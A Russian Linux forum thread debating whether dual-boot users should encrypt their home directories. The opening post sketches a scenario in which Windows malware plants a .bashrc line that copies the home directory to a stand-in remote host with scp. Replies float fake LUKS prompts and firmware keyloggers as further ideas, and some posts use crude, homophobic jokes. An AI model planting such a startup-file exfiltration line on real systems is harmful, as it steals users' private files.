LINUX.ORG.RU
Форум — Talks  

Шифруют ли дуалбутчики хомяк?

 , , ,


0

4

Теперь будете. Ловите свежую параною.

Собрал я ext4fsd, а значит любой сможет. Небезопасная, следящая десяточка, оставлена без интернета, на ней вы гадости запускаете. А после расковыривания гадостью ext4 тома в .bashrc появляется что то вроде scp -r my_home_gay_porn toopar@pentagon.ua

Перезагружаетесь в безопасный арч и с вас ловят лулзы

☆

Последнее исправление: TooPar (всего исправлений: 2)

Очень прикольно, но можешь настоящий адрес, куда отсылаются данные привести?

Ты код ext4fsd хорошо смотрел?

Несмотря на всю троянистость десяточки, чего-то большие сомнения, что вот настолько откровенно нагло и топорно она работает.

И вообще, больше похоже, что тебя подломали, просто совпало с твоими упражнениями с ext4fsd и 10-кой.

praseodim ★★★★★
()

И шо? Куда оно хоть отправляется то? На дристняточке сижу с 2018 года, никаких обновлений не ставил, только вырезал весь мусор. Никаких проблем нет, вирусни тож.

karton1 ★★★★★
()

В безопасном арчике модно шифровать /boot.

koi-sama
()
Ответ на: комментарий от praseodim

Меня не ломали, я просто за сценарий базарю. Васян-какер может действовать примерно так. А десятка может не так топорно, но врядли сдаётся если нет интернета

TooPar ☆
() автор топика

Не шифрую, у меня харды слабее чем сеть. Нагрузку сходу видно будет

upcFrost ★★★★★
()

Твой арчик поломало школота с кали

vasya_pupkin ★★★★★
()
Последнее исправление: vasya_pupkin (всего исправлений: 1)

Что за тупняк я только что прочитал?

pekmop1024 ★★★★★
()

О боги, зачем так сложно, когда можно слить весь раздел и там спокойно разобраться?

А высвободившиеся ресурсы пустить на рисование фэйкового приглашения ввода пароля LUKS, и поиметь заодним и тех, кто хомяк шифрует.

t184256 ★★★★★
()
Ответ на: комментарий от scanner

In Soviet Russia хомяк шифрует дуалбутчика.

crypt ★★★★★
()

Шифруют ли дуалбутчики хомяк?

не, они *охи позорные, а хомяк шифруют тру с одной единственной системой. настоящие тру еще и комп отключат от сети.

crypt ★★★★★
()
Ответ на: комментарий от TooPar

... а десятка...

Here’s what viruses do:

#1. They replicate quickly – okay, Windows does that.

#2. Viruses use up valuable system resources, slowing down the system as they do so – okay, Windows does that.

#3. Viruses will, from time to time, trash your hard disk – okay, Windows does that too.

#4. Viruses are usually carried, unknown to the user, along with valuable programs and systems. – Sigh.. Windows does that, too.

#5. Viruses will occasionally make the user suspect their system is too slow (see 2) and the user will buy new hardware. – Yup, Windows does that, too.

crypt ★★★★★
()

Так надо проще — не запускать всякие гадости.

А так что-то из серии, чтобы в деревне в глубинке носить бронижелет, а вдруг с мафией встретишься.

fornlr ★★★★★
()

Ещё чего не хватало. У меня Intel Atom, он и так пашет сверх возможностей.

tiinn ★★★★★
()

Тебе нехватает паранойи. Что мешает десяточке встроить keylogger в UEFI и получить пароль для расшифровки твоего хомяка?

x3al ★★★★★
()
Ответ на: комментарий от x3al

Или даже, что мешает ей активировать уже предположительно имеющийся keylogger внутри зашифрованной части bios (Intel Me, AMD PSP и прочие SGX)?

praseodim ★★★★★
()
Ответ на: комментарий от praseodim

Не, сценарий такой, что

на ней вы гадости запускаете.

Но для этого же есть виртуальная машина?

ShiningRiver ★
()

Дуалбута нет ни на одном из моих ноутов, но хомяк шифрую.

Difrex ★★★★
()

Нужно заводить отдельный комп, если нужна десяточка. И ничего секретного в нём не хранить

Harald ★★★★★
()
Ответ на: комментарий от Harald

Бомж-вариант - две коробочки для ssd, они сейчас с nvme прокачивают. Через единственный на материнке usb 3.2, конечно

TooPar ☆
() автор топика

Сценарий теоретически возможен, но вряд ли Мелкомягкие будут внедрять аж целый троян, ожидающий пока ты ему откроешь доступ к своему хомяку.

Им проще отослать сразу весь раздел на анализ, возможно разбив его при этом по частям чтоб не сильно палиться: Дисяточка - это не СексЕдишн и не Экспишечка где все файлы и каталоги наизусть знали, тут плюс минус десяток гигабайт нового дерьма уже никого не удивит.

Да и с чего ты взял, что Мелкософт не может в твой ext4 уже сейчас ? Спецификации открыты, реализаций полно, разделы можно читать даже без назначения им букв, так что они для тебя кагбе RAW, но какой-нибудь disk.sys может читать и писать.

Это я все к чему сказал …

Не усложняй. Способов тебя нагнуть есть масса других, и они попроще.

windows10 ★★★★★
()
Ответ на: комментарий от windows10

Дык эта… Десятке интернетов не давали. А шпионить надо. Так что троян в дуалбут линух внедрять придётся, чтобы интернетом попользоваться

TooPar ☆
() автор топика
Ответ на: комментарий от TooPar

Инторнет десятке не дадут 5% ее пользователей.

Из этих 5%, наверное 90% просто нищебродов у которых нет денег на инторнет, или не дающих инторнет вообще в ПеКа по соображениям безопасности, например на компе условной АЭС.

Из оставшихся 10% потенциальных дуалбутчиков, наверное у 90% в хомяках хранятся скрипты выкладываемые на гит, пони, котики, и лишь у оставшихся 10% будет лежать детское гей-порно и взаиморасчеты с контрагентами по поставке кокаина.

Короче это я к чему веду: вряд ли Microsoft почешется хотя бы одним индусом, для внедрения целого бэкдора ради 0.000004% от всех пользователей Винды.

windows10 ★★★★★
()
Ответ на: комментарий от windows10

Откуда 0.000004%?

5% / 10 / 10 = 0.05%

Полтора миллиарда виндозников на вот это = 750 тыщ дуалбутчиков-террористов. Вполне можно толпу индусов за деньги АНБ прокормить

TooPar ☆
() автор топика

Шифруют ли дуалбутчики хомяк?

Звучит как сиквел: «Мечтают ли андроиды об электроовцах?»

Kolins ★★★★★
()
Вы не можете добавлять комментарии в эту тему: топик перемещен в архив.